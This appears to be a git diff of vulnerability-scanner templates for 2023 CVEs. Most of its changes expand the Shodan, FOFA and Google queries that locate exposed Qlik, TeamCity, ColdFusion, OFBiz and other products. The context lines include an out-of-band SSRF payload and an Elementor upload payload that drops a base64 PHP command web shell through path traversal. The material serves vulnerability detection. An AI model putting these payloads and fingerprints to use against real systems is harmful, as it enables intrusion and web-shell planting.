intitle:"qlik-sense" tags: cve2023,cve,kev,qlik,smuggling,windows diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index bfb288fc63..f7905e4745 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -25,8 +25,15 @@ info: vendor: qlik product: qlik_sense framework: windows - shodan-query: http.favicon.hash:-74348711 - fofa-query: app="qlik-sense" + shodan-query: + - http.favicon.hash:-74348711 + - http.html:"qlik" + - http.title:"qlik-sense" + fofa-query: + - app="qlik-sense" + - title="qlik-sense" + - icon_hash=-74348711 + - body="qlik" google-query: intitle:"qlik-sense" tags: cve2023,cve,qlik,traversal,kev,windows diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index e00b6dbf25..8d20471505 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -30,7 +30,10 @@ info: vendor: moosocial product: moostore shodan-query: http.favicon.hash:"702863115" - fofa-query: mooSocial + fofa-query: + - mooSocial + - moosocial + - icon_hash="702863115" tags: cve2023,cve,packetstorm,moosocial,xss http: diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 45a9412938..2852509cb3 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -30,7 +30,9 @@ info: vendor: moosocial product: moostore shodan-query: http.favicon.hash:"702863115" - fofa-query: icon_hash="702863115" + fofa-query: + - icon_hash="702863115" + - moosocial tags: cve,cve2023,packetstorm,moosocial,xss http: diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index 83b280095d..840c4334e5 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -24,9 +24,11 @@ info: max-request: 1 vendor: microsoft product: skype_for_business_server - shodan-query: html:"Skype for Business" + shodan-query: + - html:"Skype for Business" + - http.html:"skype for business" fofa-query: body="skype for business" - tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev + tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev,microsoft variables: ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//" diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 03cb6859b5..a595d0cccc 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: craftcms product: craft_cms - shodan-query: http.favicon.hash:-47932290 - fofa-query: icon_hash=-47932290 + shodan-query: + - http.favicon.hash:-47932290 + - cpe:"cpe:2.3:a:craftcms:craft_cms" + - http.html:craftcms + fofa-query: + - icon_hash=-47932290 + - body=craftcms publicwww-query: "craftcms" tags: cve2023,cve,rce,unauth,craftcms diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml index 2af71c7c71..260cec8948 100644 --- a/http/cves/2023/CVE-2023-42343.yaml +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -14,7 +14,14 @@ info: metadata: verified: true max-request: 1 - shodan-query: "/opencms/" + shodan-query: + - "/opencms/" + - http.title:"opencms" + - cpe:"cpe:2.3:a:alkacon:opencms" + product: opencms + vendor: alkacon + fofa-query: title="opencms" + google-query: intitle:"opencms" tags: cve,cve2023,xss,opencms http: diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index fd3dbfd808..2a148fce70 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: fit2cloud product: jumpserver - fofa-query: title="JumpServer" + fofa-query: + - title="JumpServer" + - title="jumpserver" tags: cve2023,cve,jumpserver,exposure,fit2cloud http: diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index 8b171bec3f..7d2584371d 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -25,8 +25,13 @@ info: max-request: 5 vendor: jetbrains product: teamcity - shodan-query: title:TeamCity - fofa-query: title=TeamCity + shodan-query: + - title:TeamCity + - http.title:teamcity + - http.component:"teamcity" + fofa-query: + - title=TeamCity + - title=teamcity google-query: intitle:teamcity tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index fca1c6ab1c..e47ec1dfe8 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -20,11 +20,14 @@ info: epss-percentile: 0.99539 cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: nextgen - product: mirth_connect - shodan-query: title:"mirth connect administrator" - fofa-query: title="mirth connect administrator" - google-query: intitle:"mirth connect administrator" + product: "mirth_connect" + shodan-query: + - "title:\"mirth connect administrator\"" + - http.title:"mirth connect administrator" + fofa-query: "title=\"mirth connect administrator\"" + google-query: "intitle:\"mirth connect administrator\"" tags: packetstorm,cve,cve2023,nextgen,rce,kev http: diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 0156015bfa..b7db700045 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -25,10 +25,16 @@ info: max-request: 2 vendor: digitaldruid product: hoteldruid - shodan-query: title:"HotelDruid" - fofa-query: title="HotelDruid" + shodan-query: + - title:"HotelDruid" + - http.title:"hoteldruid" + - http.favicon.hash:-1521640213 + fofa-query: + - title="HotelDruid" + - title="hoteldruid" + - icon_hash=-1521640213 google-query: intitle:"hoteldruid" - tags: cve,cve2023,hoteldruid,cms,sqli + tags: cve,cve2023,hoteldruid,cms,sqli,digitaldruid flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 1b03319341..68cd272de0 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -24,8 +24,13 @@ info: max-request: 2 vendor: osgeo product: geoserver - shodan-query: title:"GeoServer" - fofa-query: app="GeoServer" + shodan-query: + - title:"GeoServer" + - http.title:"geoserver" + fofa-query: + - app="GeoServer" + - app="geoserver" + - title="geoserver" google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo variables: diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index 1a4909be15..fb1041ffa7 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -22,8 +22,14 @@ info: max-request: 8 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe Coldfusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe Coldfusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,coldfusion,adobe,xss variables: diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index aa04c22912..cf0a5659ad 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -27,8 +27,14 @@ info: max-request: 4 vendor: adobe product: coldfusion - shodan-query: http.component:"Adobe ColdFusion" - fofa-query: title="coldfusion administrator login" + shodan-query: + - http.component:"Adobe ColdFusion" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - title="coldfusion administrator login" + - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,coldfusion,deserialization,xss variables: diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index c73b212557..08a4e56944 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -25,8 +25,13 @@ info: max-request: 1 vendor: agentejo product: cockpit - shodan-query: html:"Cockpit" - fofa-query: icon_hash=688609340 + shodan-query: + - html:"Cockpit" + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve2023,cve,huntr,cockpit,xss,agentejo http: diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index 2ab6310d5b..65f2741e71 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -23,10 +23,11 @@ info: epss-percentile: 0.84242 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: + max-request: 2 vendor: moosocial product: moosocial - shodan-query: http.favicon.hash:"702863115" - fofa-query: icon_hash="702863115" + shodan-query: "http.favicon.hash:\"702863115\"" + fofa-query: "icon_hash=\"702863115\"" tags: cve2023,cve,moosocial,xss flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index 9d0c9e2e8c..c299f6dfbc 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: moosocial product: moosocial - shodan-query: http.favicon.hash:702863115 + shodan-query: + - http.favicon.hash:702863115 + - http.favicon.hash:"702863115" fofa-query: icon_hash="702863115" tags: cve,cve2023,moosocial,xss diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index 36eba8883d..0259a8e718 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -19,12 +19,13 @@ info: epss-percentile: 0.90979 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:* metadata: + max-request: 2 vendor: mooveagency - product: import_xml_and_rss_feeds + product: "import_xml_and_rss_feeds" framework: wordpress - shodan-query: http.html:"import-xml-feed" - fofa-query: body="import-xml-feed" - tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce + shodan-query: "http.html:\"import-xml-feed\"" + fofa-query: "body=\"import-xml-feed\"" + tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce,mooveagency flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index 984446aece..b592c84662 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -18,12 +18,12 @@ info: cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: 01generator product: pireospay framework: prestashop - shodan-query: http.component:"prestashop" - tags: cve,cve2023,sqli,prestashop,pireospay + shodan-query: "http.component:\"prestashop\"" + tags: cve,cve2023,sqli,prestashop,pireospay,01generator flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index 2e270317c4..19da7ce5f3 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: dlink product: dar-8000-10_firmware - fofa-query: body="DAR-8000-10" && title="D-Link" + fofa-query: + - body="DAR-8000-10" && title="D-Link" + - body="dar-8000-10" && title="d-link" tags: cve,cve2023,dlink http: diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index f70d7f4030..289211b0d2 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -24,7 +24,9 @@ info: max-request: 1 vendor: frigate product: frigate - shodan-query: title:"Frigate" + shodan-query: + - title:"Frigate" + - http.title:"frigate" fofa-query: title="frigate" google-query: intitle:"frigate" tags: cve,cve2023,frigate,xss diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index b214413bbb..16b774543a 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -24,8 +24,14 @@ info: max-request: 1 vendor: papercut product: papercut_ng - shodan-query: html:"content=\"PaperCut\"" - fofa-query: body='content="papercut' + shodan-query: + - html:"content=\"PaperCut\"" + - http.html:'content="papercut' + - cpe:"cpe:2.3:a:papercut:papercut_ng" + - http.html:"content=\"papercut\"" + fofa-query: + - body='content="papercut' + - body="content=\"papercut\"" google-query: html:'content="papercut' tags: cve2023,cve,unauth,papercut diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 2296049141..72c2cbc036 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: viessmann product: vitogate_300_firmware - shodan-query: title:"Vitogate 300" - fofa-query: title="Vitogate 300" + shodan-query: + - title:"Vitogate 300" + - http.title:"vitogate 300" + fofa-query: + - title="Vitogate 300" + - title="vitogate 300" google-query: intitle:"vitogate 300" tags: cve2023,cve,rce,vitogate,viessmann diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index 1c08d1ff93..df95bf56ee 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -23,10 +23,11 @@ info: epss-percentile: 0.70433 cpe: cpe:2.3:a:qdpm:qdpm:9.2:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: qdpm product: qdpm - shodan-query: http.favicon.hash:762074255 - fofa-query: icon_hash=762074255 + shodan-query: "http.favicon.hash:762074255" + fofa-query: "icon_hash=762074255" tags: cve,cve2023,qdpm,lfi http: diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index e9b2f188d1..3f369abe5d 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -28,7 +28,9 @@ info: framework: wordpress shodan-query: http.html:/wp-content/plugins/forminator fofa-query: body=/wp-content/plugins/forminator - publicwww-query: /wp-content/plugins/Forminator + publicwww-query: + - /wp-content/plugins/Forminator + - /wp-content/plugins/forminator tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub variables: string: "CVE-2023-4596" diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index fd414b8270..e41de71bb2 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -24,7 +24,7 @@ info: product: ndk_steppingpack framework: prestashop shodan-query: http.component:"prestashop" - tags: cve,cve2023,sqli,prestashop,ndk_steppingpack + tags: cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign http: - raw: diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index 24d84a38c4..0dbd4df84c 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -27,7 +27,7 @@ info: vendor: hardy-barth product: cph2_echarge shodan-query: html:"Salia PLCC" - tags: cve2023,cve,salia-plcc,cph2,rce + tags: cve2023,cve,salia-plcc,cph2,rce,hardy-barth http: - method: GET diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 60047d0dd1..ed38f64241 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -25,7 +25,9 @@ info: max-request: 2 vendor: totolink product: a3700r_firmware - shodan-query: title:"Totolink" + shodan-query: + - title:"Totolink" + - http.title:"totolink" fofa-query: title="totolink" google-query: intitle:"totolink" tags: cve,cve2023,totolink,router,iot,rce diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index 7242a7edba..225185b574 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -25,7 +25,9 @@ info: max-request: 7 vendor: f5 product: big-ip_access_policy_manager - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + shodan-query: + - http.title:"BIG-IP®-+Redirect" +"Server" + - http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index 5887f56639..efacf2bd89 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -22,10 +22,12 @@ info: max-request: 3 vendor: zohocorp product: manageengine_firewall_analyzer - shodan-query: "http.title:\"OpManager Plus\"" + shodan-query: + - "http.title:\"OpManager Plus\"" + - http.title:"opmanager plus" fofa-query: title="opmanager plus" google-query: intitle:"opmanager plus" - tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive + tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp http: - raw: diff --git a/http/cves/2023/CVE-2023-47246.yaml b/http/cves/2023/CVE-2023-47246.yaml index b83f741a43..d64828fbc8 100644 --- a/http/cves/2023/CVE-2023-47246.yaml +++ b/http/cves/2023/CVE-2023-47246.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: sysaid product: sysaid_on-premises - shodan-query: http.favicon.hash:1540720428 + shodan-query: + - http.favicon.hash:1540720428 + - http.favicon.hash:"1540720428" fofa-query: icon_hash="1540720428" tags: cve,cve2023,sysaid,rce,kev,traversal,intrusive variables: diff --git a/http/cves/2023/CVE-2023-47643.yaml b/http/cves/2023/CVE-2023-47643.yaml index aacf536e8b..262d96bf24 100644 --- a/http/cves/2023/CVE-2023-47643.yaml +++ b/http/cves/2023/CVE-2023-47643.yaml @@ -27,10 +27,12 @@ info: max-request: 2 vendor: salesagility product: suitecrm - shodan-query: title:"SuiteCRM" + shodan-query: + - title:"SuiteCRM" + - http.title:"suitecrm" fofa-query: title="suitecrm" google-query: intitle:"suitecrm" - tags: cve,cve2023,graphql,suitecrm,introspection + tags: cve,cve2023,graphql,suitecrm,introspection,salesagility http: - raw: diff --git a/http/cves/2023/CVE-2023-48023.yaml b/http/cves/2023/CVE-2023-48023.yaml index dbb59e4a31..498ca34668 100644 --- a/http/cves/2023/CVE-2023-48023.yaml +++ b/http/cves/2023/CVE-2023-48023.yaml @@ -22,9 +22,15 @@ info: metadata: verified: true max-request: 1 - vendor: Anyscale - shodan-query: http.favicon.hash:463802404 - tags: cve,cve2023,ssrf,ray,anyscale + vendor: ray_project + shodan-query: + - http.favicon.hash:463802404 + - http.html:"ray dashboard" + product: ray + fofa-query: + - icon_hash=463802404 + - body="ray dashboard" + tags: cve,cve2023,ssrf,ray,anyscale,Anyscale http: - method: GET diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml index 5736e9dbc0..c817761ce1 100644 --- a/http/cves/2023/CVE-2023-48084.yaml +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -29,9 +29,12 @@ info: vendor: nagios product: nagios_xi shodan-query: http.title:"nagios xi" - fofa-query: title="Nagios XI" + fofa-query: + - title="Nagios XI" + - title="nagios xi" + - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2023,nagiosxi,sqli,authenticated + tags: cve,cve2023,nagiosxi,sqli,authenticated,nagios http: - raw: diff --git a/http/cves/2023/CVE-2023-48777.yaml b/http/cves/2023/CVE-2023-48777.yaml index 58d147569a..7b357f721e 100644 --- a/http/cves/2023/CVE-2023-48777.yaml +++ b/http/cves/2023/CVE-2023-48777.yaml @@ -9,13 +9,20 @@ info: remediation: Fixed in 3.18.2 reference: - https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/ + - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-18-0-arbitrary-file-upload-vulnerability?_s_id=cve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2023-48777 + cwe-id: CWE-434 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: verified: true max-request: 4 framework: wordpress publicwww-query: "/wp-content/plugins/elementor/" tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated - variables: filename: "{{rand_base(6)}}" payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}' diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index 2d706d3448..976ed2e726 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -25,8 +25,14 @@ info: max-request: 1 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2023,seclists,apache,ofbiz,deserialization,rce http: diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index fc3671a7cf..a3bf5fea1d 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: owncloud product: graph_api - shodan-query: title:"owncloud" + shodan-query: + - title:"owncloud" + - http.title:"owncloud" fofa-query: title="owncloud" google-query: intitle:"owncloud" tags: cve2023,cve,owncloud,phpinfo,config,kev diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index b6f5c62688..0957853d15 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -25,7 +25,9 @@ info: max-request: 2 vendor: citrix product: netscaler_application_delivery_controller - shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway" + shodan-query: + - title:"Citrix Gateway" || title:"Netscaler Gateway" + - http.title:"citrix gateway" || title:"netscaler gateway" fofa-query: title="citrix gateway" || title:"netscaler gateway" google-query: intitle:"citrix gateway" || title:"netscaler gateway" tags: cve,cve2023,citrix,adc,info-leak,kev,exposure diff --git a/http/cves/2023/CVE-2023-4973.yaml b/http/cves/2023/CVE-2023-4973.yaml index 40ebc73b1e..8b06122783 100644 --- a/http/cves/2023/CVE-2023-4973.yaml +++ b/http/cves/2023/CVE-2023-4973.yaml @@ -20,8 +20,12 @@ info: max-request: 1 vendor: creativeitem product: academy_lms - shodan-query: html:"Academy LMS" - fofa-query: body="Academy LMS" + shodan-query: + - html:"Academy LMS" + - http.html:"academy lms" + fofa-query: + - body="Academy LMS" + - body="academy lms" tags: packetstorm,cve2023,cve,academylms,xss,creativeitem http: diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index ffc9dbe95d..d0baf60453 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: creativeitem product: academy_lms - shodan-query: html:"Academy LMS" + shodan-query: + - html:"Academy LMS" + - http.html:"academy lms" fofa-query: body="academy lms" tags: cve,cve2023,packetstorm,sqli,academy,lms,creativeitem diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index 1fc02e1c68..4a8ec14968 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -23,7 +23,7 @@ info: vendor: miniorange product: active_directory_integration_\/_ldap_integration framework: wordpress - tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin + tags: wpscan,exposure,csv,ldap,wordpress,wp-plugin,cve,cve2023,miniorange http: - method: GET diff --git a/http/cves/2023/CVE-2023-50290.yaml b/http/cves/2023/CVE-2023-50290.yaml index 839282aa43..fdc14dffa9 100644 --- a/http/cves/2023/CVE-2023-50290.yaml +++ b/http/cves/2023/CVE-2023-50290.yaml @@ -28,9 +28,17 @@ info: max-request: 1 vendor: apache product: solr - shodan-query: "title:\"Apache Solr\"" - fofa-query: title="solr admin" - google-query: intitle:"apache solr" + shodan-query: + - "title:\"Apache Solr\"" + - http.title:"apache solr" + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve,cve2023,apache,solr,exposure http: diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 63b4dbf8b0..b607a9fc06 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: dlink product: d-view_8 - shodan-query: http.favicon.hash:-1317621215 + shodan-query: + - http.favicon.hash:-1317621215 + - http.favicon.hash:"-1317621215" fofa-query: icon_hash="-1317621215" tags: cve2023,cve,d-link,auth-bypass,dlink diff --git a/http/cves/2023/CVE-2023-5089.yaml b/http/cves/2023/CVE-2023-5089.yaml index a17f063362..46ea75baeb 100644 --- a/http/cves/2023/CVE-2023-5089.yaml +++ b/http/cves/2023/CVE-2023-5089.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/defender-security/ fofa-query: body=/wp-content/plugins/defender-security/ publicwww-query: "/wp-content/plugins/defender-security/" - tags: cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect + tags: cve,cve2023,wordpress,wpscan,wp-plugin,defender-security,redirect,wpmudev http: - method: GET diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index 3ff945baf1..7df5c46562 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -26,8 +26,11 @@ info: vendor: mjdm product: majordomo shodan-query: http.favicon.hash:1903390397 - fofa-query: app="MajordomoSL" - tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os + fofa-query: + - app="MajordomoSL" + - app="majordomosl" + - icon_hash=1903390397 + tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os,mjdm http: - method: GET diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index 047939bafb..a0f7b0385d 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -25,8 +25,14 @@ info: max-request: 4 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2023,apache,ofbiz,ssrf variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index fcdac6e0b3..b414d79fa2 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -24,8 +24,14 @@ info: max-request: 1 vendor: apache product: ofbiz - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" + shodan-query: + - html:"OFBiz" + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - app="Apache_OFBiz" + - body="ofbiz" + - app="apache_ofbiz" tags: cve2023,cve,apache,ofbiz,rce http: diff --git a/http/cves/2023/CVE-2023-52085.yaml b/http/cves/2023/CVE-2023-52085.yaml index 3f002294c4..6d7b5535c9 100644 --- a/http/cves/2023/CVE-2023-52085.yaml +++ b/http/cves/2023/CVE-2023-52085.yaml @@ -21,8 +21,12 @@ info: max-request: 4 vendor: wintercms product: winter - shodan-query: "title:\"Winter CMS\"" - fofa-query: "title=\"Winter CMS\"" + shodan-query: + - "title:\"Winter CMS\"" + - http.title:"winter cms" + fofa-query: + - "title=\"Winter CMS\"" + - title="winter cms" google-query: intitle:"winter cms" tags: cve,cve2023,authenticated,lfi,wintercms diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index ed253e3a45..a21c52c6f2 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: microweber product: microweber - shodan-query: http.favicon.hash:780351152 - fofa-query: body="microweber" + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2023,huntr,xss,microweber http: diff --git 